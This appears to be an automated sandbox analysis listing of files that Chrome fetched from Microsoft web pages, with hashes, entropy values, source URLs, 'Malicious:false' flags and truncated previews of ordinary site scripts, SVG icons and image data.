                                                                                                                                                                                                                                                          Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):175
                                                                                                                                                                                                                                                          Entropy (8bit):4.68043398329258
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                                                                                                                                                          MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                                                                                                                                                          SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                                                                                                                                                          SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                                                                                                                                                          SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js
                                                                                                                                                                                                                                                          Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):2432
                                                                                                                                                                                                                                                          Entropy (8bit):4.834130257531367
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:s9JaZbpyRv71XBd8jByZJ4JaWuOjZPpHy6oTUU4yKN7y+J4WPM+Nd:0AZdABXLEUZOxjZPo6S1G7es
                                                                                                                                                                                                                                                          MD5:F25FEC6821F63D701A6B6291A4011894
                                                                                                                                                                                                                                                          SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                                                                                                                                                                                                          SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                                                                                                                                                                                                          SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-click-group-telemetry.min.ACSHASHf25fec6821f63d701a6b6291a4011894.js
                                                                                                                                                                                                                                                          Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1583
                                                                                                                                                                                                                                                          Entropy (8bit):4.041589377749132
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:tYU/duAyjKLuB8jnafFl+sghXRuh30+GuwrVcsbeu6uV4LTD+29ww/b0F2KcDh:n/sKLu2afuhXRuhNGuwJSsUiaZ/42Kcd
                                                                                                                                                                                                                                                          MD5:29E9B36995DBCDDFEE5BCFC013C2E695
                                                                                                                                                                                                                                                          SHA1:A7A7A240495116E98296BBA513DAD863C7748EC6
                                                                                                                                                                                                                                                          SHA-256:97F584E82B7B6C7A96DA0B8C0D2211B5DD550E5F731621FC57E7A6DC03D0C3CA
                                                                                                                                                                                                                                                          SHA-512:88CA3C8F04DEBB8FEA817A93E4F3E4374297865D1AE22B086503228FF3BDABB284CD41BC7CFC98A4EBDE65B366AFABA233D384A45135B338DEDC93101E95E877
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Connect-to-data.svg
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4 6C4 5.30945 4.3153 4.70664 4.77423 4.22025C5.2294 3.73784 5.85301 3.33745 6.56668 3.01752C7.99575 2.3769 9.91738 2 12 2C14.0826 2 16.0042 2.3769 17.4333 3.01752C18.147 3.33745 18.7706 3.73784 19.2258 4.22025C19.6847 4.70664 20 5.30945 20 6V18C20 18.6906 19.6847 19.2934 19.2258 19.7798C18.7706 20.2622 18.147 20.6626 17.4333 20.9825C16.0042 21.6231 14.0826 22 12 22C9.91738 22 7.99575 21.6231 6.56668 20.9825C5.85301 20.6626 5.2294 20.2622 4.77423 19.7798C4.3153 19.2934 4 18.6906 4 18V6ZM5.5 6C5.5 6.20691 5.59044 6.45909 5.86525 6.75034C6.14382 7.04559 6.58195 7.3455 7.18027 7.61372C8.37519 8.14937 10.0786 8.5 12 8.5C13.9214 8.5 15.6248 8.14937 16.8197 7.61372C17.418 7.3455 17.8562 7.04559 18.1348 6.75034C18.4096 6.45909 18.5 6.20691 18.5 6C18.5 5.79309 18.4096 5.54091 18.1348 5.24966C17.8562 4.95441 17.418 4.65449 16.8197 4.38628C15.6248 3.85063 13.9214 3.5 12 3.5C10.0786 3.5 8.3751
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):93450
                                                                                                                                                                                                                                                          Entropy (8bit):7.997528228307785
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:1536:Z39pzyHP0xtVRKMlwwTgnuweBsfgcD6HbDddxe9nftLpw:9mHcZDhHl71eS
                                                                                                                                                                                                                                                          MD5:2CF33A28A94D25F04A81319E53357A13
                                                                                                                                                                                                                                                          SHA1:6A74A2BBAC908704424993A3037BA3742D0929E7
                                                                                                                                                                                                                                                          SHA-256:7F7471D2767CB2ACA1074036DC03CC5DAB6B4B2D64EBA954BE2C6D133DB9D6E5
                                                                                                                                                                                                                                                          SHA-512:B6A42A7E723DD01C18A51C4F205E0A38CC583FE43AB50A2FF47E03AAF1F43886533BA146AEC2D5AF4DB404C44131CCCAE8A47A2A2E3D25501DEC3CBE6CE491E7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Resouces-02-416X179?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1010&hei=433&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............k....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................k.mdat.....&?....4..2....0....+o?..!..Cm#.d."........].....L.%...~...X.sKA.FD..p....*-.....5.=..Lv.W.f...:..N......I..W.....4.v......|..*.....`..r2..9( ..{U.....hp.J"50...4.b...}.tq..o......3.R%$Q...r....".8J...<h.5..O.{...Z|.......z:...<V...Y....].o.U.Q.r.v.qZ..L....6..O.h.8.......%]ml.V..Gc.$.. .t...1..V8.*.o.z.!.@..0.X..<.,.p!`h.....$#.....c.yT+.e..,.!YH.eIuQ.B83...[D. lO2:....waN...K.J&-..h....B./.K.65@..n.m.....X.z!..Q).^..E.;....>.0..S...4M.j=%07..X...i..I..,iF...i....S..._..0.>C.4.K.$.b..5M.....3R... ....t.#Qg=M.tZ...r......y....O....[.%.t{%.Q..;.{=;..RN..,..|i.~Q....D.....&.B.+........A{.r.M[..|]...I4...d...F.YP.`m..?....3..G{.S.a._.o.U.o>.' ...;.r....y.......H.oe.. E..q.. ......T.j..x
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (366)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1904
                                                                                                                                                                                                                                                          Entropy (8bit):4.802036868832552
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nl6d5pMwWkcphd5pMwW1qFRFvrukF0gx5eg6eZ3DrvvBuWky86q8HqouQN:lK5m4Ub5m4jvqyVx58eZvgyFqWqy
                                                                                                                                                                                                                                                          MD5:305E80CB22D0F14E474C408C181CB792
                                                                                                                                                                                                                                                          SHA1:8B946E3AD049A39E3BBC925B1D40BBE2F2A7E2B6
                                                                                                                                                                                                                                                          SHA-256:A8FB92359BE5D0FB839DED898756E674A74C9A52DA8340431C2CF24B05AA43C5
                                                                                                                                                                                                                                                          SHA-512:4F398BC8323454C5213EF37A5425A7FB114CE251A8C63C5112001DE1879EA23BBBD8A0C96DA78B7F189C659D63AFE273D90833DB464AEDBA98F6F32EF98BE8D9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';function getSkuMarkup(a,c){let b=a.discountedTextTemplate;a.isDiscounted&&b&&(b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.ListPriceKey,c.sku.displayListPrice),b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.MsrpKey,c.sku.displayMSRPPrice));const d=`. <div . class="sku__pricing-discount">. <span class="oc-displayMSRPPrice">${c.sku.displayMSRPPrice}</span>. </div>. `,e=`. <div class="sku__detail-recurrence">. <span class="oc-displayUnit">${a.displayUnitMap[c.productId]}. </span>. </div>. `;return`. <div class="sku__title" data-ocr-pricing-render="title">. <h3 class="oc-product-title">${a.renderTitle}</h3>. </div>. <div class="sku__paragraph" data-ocr-pricing-content="paragraph"></div>. ${a.isDiscounted?`. <p class="sr-only" data-ocr-pricing-render="sc
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):136907
                                                                                                                                                                                                                                                          Entropy (8bit):7.9983188309260465
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:3072:8cOvvenhOuVM9oRvuypE+BZQcPgdo3cAwQbQ284WICoEau/8dE:8cTtVZOiKcp3K2eFaHE
                                                                                                                                                                                                                                                          MD5:63A7B7E8E07E90552F6FF9CB30F56A4C
                                                                                                                                                                                                                                                          SHA1:45E416838F6693753C72A782E0ED2C20A78CD097
                                                                                                                                                                                                                                                          SHA-256:064C5462A9E2CD3365785D44417A141C44C67FE886D607EC338C313862B87364
                                                                                                                                                                                                                                                          SHA-512:0296095290C4B8201E37E4EE697CD81F742E54DC3B4FCDB12BDA7AE4E295FBD9BC14DA47E8D9357D7B3A9EF39BF54E1B107F14D715EE6B26C981C3463A75CB5F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Resouces-03-416X179?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1010&hei=433&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.....&?....4..2....0....C7.jv..-^;.r%..`d...;.~.<.1.(Q.q.cO..e9p@Z@..B..`.a/.d.H....#..e>\.4.*.......^..];...3u...V.zj...H.......NP.O.[..B..(..y>..=..m..X.C...,P......].`nB.:C}.6..o.H..?.<...f..w.......%.w.....o:. .........c..bH*..k"....>M}..*.%92.Z.B^.P...8...|..c...Y..{..x...S.{.X.....t..?....v....5..#....K4..Pn.....{..............\._...R.Q...I.....,..)K../;&.u$...........l'.6.^(......]`.gr.l..z...E.4.#$.]$....o.e....;V\o..@...V(.u..$....V....'..hq..>S...Q..Z;H.a|.[S...G.4.....yU9.M......B.0F... D.P(]R-..(..{.6.E....b..Y..x....7...$".}.T..^_...y.y.Oe..rQ.E..V...W=..-t...nT.b......B.9.)...(....z...i.CL`. ).O....o..mcS.0.O..EX.+.e.F...3.E.;+.....'?.1.o\..FBo...\.v..Q..~L\
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):7370
                                                                                                                                                                                                                                                          Entropy (8bit):3.75734059903263
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:ABNDpn0ClSyOM+kS1GgOO4Ry/SbSCRt3NXZv9c8ZmOy7PmcscRxqQLC8t5XKFOh5:ABNd93OM+kSFcPb9Rr1ybmcVt5XK/E
                                                                                                                                                                                                                                                          MD5:78CAE0B5E8FB1E22438351F87E648B9C
                                                                                                                                                                                                                                                          SHA1:DDA45E1E6E25100736B33A4614869200FF59556C
                                                                                                                                                                                                                                                          SHA-256:689F7AA37A90110B616381333171DE18B3F3A06B3B965FCE73BBBB84D0B777D7
                                                                                                                                                                                                                                                          SHA-512:43E48DF413591881F27A96858B7FA4EC77EFF66D56C64BE81D04F5A85F2701374E871F021B1BDE808211BE4D40B12A10F28D2AF5BF520BC523FAD909144C242C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Share-insights.svg
                                                                                                                                                                                                                                                          Preview:<svg width="23" height="24" viewBox="0 0 23 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.25 4.5C12.1797 4.5 13.0547 4.67578 13.875 5.02734C14.6953 5.37891 15.4102 5.86328 16.0195 6.48047C16.6289 7.09766 17.1094 7.8125 17.4609 8.625C17.8125 9.4375 17.9922 10.3125 18 11.25C18 11.7422 17.9688 12.2031 17.9062 12.6328C17.8437 13.0625 17.7461 13.4727 17.6133 13.8633C17.4805 14.2539 17.3086 14.6406 17.0977 15.0234C16.8867 15.4063 16.6367 15.7969 16.3477 16.1953C16.1211 16.5078 15.9219 16.7891 15.75 17.0391C15.5781 17.2891 15.4375 17.5391 15.3281 17.7891C15.2188 18.0391 15.1367 18.3125 15.082 18.6094C15.0273 18.9063 15 19.2539 15 19.6523V21.75C15 22.0625 14.9414 22.3555 14.8242 22.6289C14.707 22.9023 14.5469 23.1406 14.3438 23.3438C14.1406 23.5469 13.9023 23.707 13.6289 23.8242C13.3555 23.9414 13.0625 24 12.75 24H9.75C9.4375 24 9.14453 23.9414 8.87109 23.8242C8.59766 23.707 8.35938 23.5469 8.15625 23.3438C7.95312 23.1406 7.79297 22.9023 7.67578 22.6289C7.55859 22.3555 7.5 2
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):306991
                                                                                                                                                                                                                                                          Entropy (8bit):7.999079271084784
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:6144:dH8udw/ts5BFVFlZucKE94v3mwURsHLuSP7jQd5R1dSdrCtXWiT+dp:BdGs5BvFVKEMWwURsie7jQdb7SwtXlij
                                                                                                                                                                                                                                                          MD5:AC077690B702C56C194805A9B93AD22C
                                                                                                                                                                                                                                                          SHA1:C696DD409856DE7BABA70F666639E49A829E4FEA
                                                                                                                                                                                                                                                          SHA-256:09707687A5A4D6EA4650B6B97F6443FB5CB61DE2E8B0E09A85433B6467864A65
                                                                                                                                                                                                                                                          SHA-512:B9E22270438482F3CA968193FAF6D7C4DF0E1D43C1DD0F0B074D7BA61AF2194DB0939ABC70741C96E65003761A09812FFE8E4D4EE3270F00514E4AB41A11E0D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Accordian-01-593X334?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2998&hei=1689&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat........Lp@CA.2...D.........1k.=*.[jJ3"} .NG!....y..s.V.c?m.k..|k9<.Vw.s.F..@itm.x..G.....k..-d.........Dc.s.....o.....Xm\.L..z...*.s".6....>...<.^..4.h.Z...._"&..I.3....X..z..........f...[.......Z........P...#5....v.2t.7......=K.6.F...K{.D.P.x+A....g.F..J../.........C..C.X......AG~2.v.w.4.....t..gQ....Ed^....#.....2.0.a..m.....X3o.>....a.."B{.$v...e.....S.....?..W.2...U...0P...6h........L..=.f..d.|j..1..,I...^!")./.[.....0{........k..9.T;..y{.M.c..:.....u.zK....]t"........x...et~.S.Yl...h.F..b.{...) ..L^1g...6x..M.lE...6x.w&Qay....04..bfG.it.P.U.......J./rt...4..$G.dc'.........Q..&J86..z/.D.|.9^..//..E...0..f!../g\D..:.^.L.fu....`..u@....ld+....2.;I..NI..?me0...G^....i...P....@:
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (23186), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):23650
                                                                                                                                                                                                                                                          Entropy (8bit):5.767139750482705
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:HWjjbHIEsQdsQvZxyF1Aw8B7Nv0edjuDNaFTLLb2M/zvyMEZWpV:2TH9yF1IBBdq5yF/2dW
                                                                                                                                                                                                                                                          MD5:4F3B88221B599B59C5B54F2A9A79EDD7
                                                                                                                                                                                                                                                          SHA1:E57F78D444C0CC3996AF9ADA69D424DC16770455
                                                                                                                                                                                                                                                          SHA-256:9B295045FB14DC07182BE4AA44A35734756FED8C26078F002C0CC10A07E4F8F9
                                                                                                                                                                                                                                                          SHA-512:5EAB24171E685F10D9F3A5F9AB536858D31436BC9112F74C2F516F5030D57764DBBADF4416E05E5C7CC5285EC9B2E81A8F5B38838BCFB8733D8EE270301618E9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://fpt.microsoft.com/tags?session_id=7ed10337-5407-47ee-82b9-e4d42fe45bf1
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>.. <script>var localTarget='https://fpt.microsoft.com/',target='https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&',txnId='7ed10337-5407-47ee-82b9-e4d42fe45bf1',ticks='8DD214F3285FD01',rid='0f8d3c85-df49-487c-a50d-5b352052027b',authKey='H3ihr9e92IdW6yd1ZgQ9SzatWryjyxVbTdQYFEUia0ZuzBypqyB1zrvZmVdHwJ4Y%252fqY64wBUWBurFVjvLjPgLuXvtfDDlaArWtjPkOZCetgH%252bbCqgQ6LsI3HK8%252fyVO4IAvt1B4aw5BYLnd764tmEQCoTwkPn6mkmOns0wIsuErTlJ9y7oWU4S6Plf9N0J7nGAFwGgrIsuKJ5ZnE82KADAZHZw%252fcURTOA%252fNdMpnUkxGaV%252bnaX%252bt%252fH7QDhFVyBidCKycbgTY8d0KRFzoD%252bStDLreYhR%252fDsvdnLvDrtpnHOgnwsHKlo4qzXRBYPO0FGDPCH',cid='02C58649-E822-405B-B6C3-17A7509D2FCC',assessment='',waitresponse=false,bbwait=false,commonquery='',lsInfo=true,splitFonts=false,noFonts=false,UCH=true,PTO=100,rticks=1734737819025,ipv6Url='',txnKey='session_id',ridKey='id',lskey='MUID';(function(){function w(){var i=0,n;return t&&t.length&&(i=t.l
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9849
                                                                                                                                                                                                                                                          Entropy (8bit):4.327507698755054
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:0OQGrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubepd:DrzjDYq5FEFLjRJpKJxWrqhKGXy83Y39
                                                                                                                                                                                                                                                          MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                                                                                                                                                                                                          SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                                                                                                                                                                                                          SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                                                                                                                                                                                                          SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):6798
                                                                                                                                                                                                                                                          Entropy (8bit):5.383941368080596
                                                                                                                                                                                                                                                          Encrypted:false
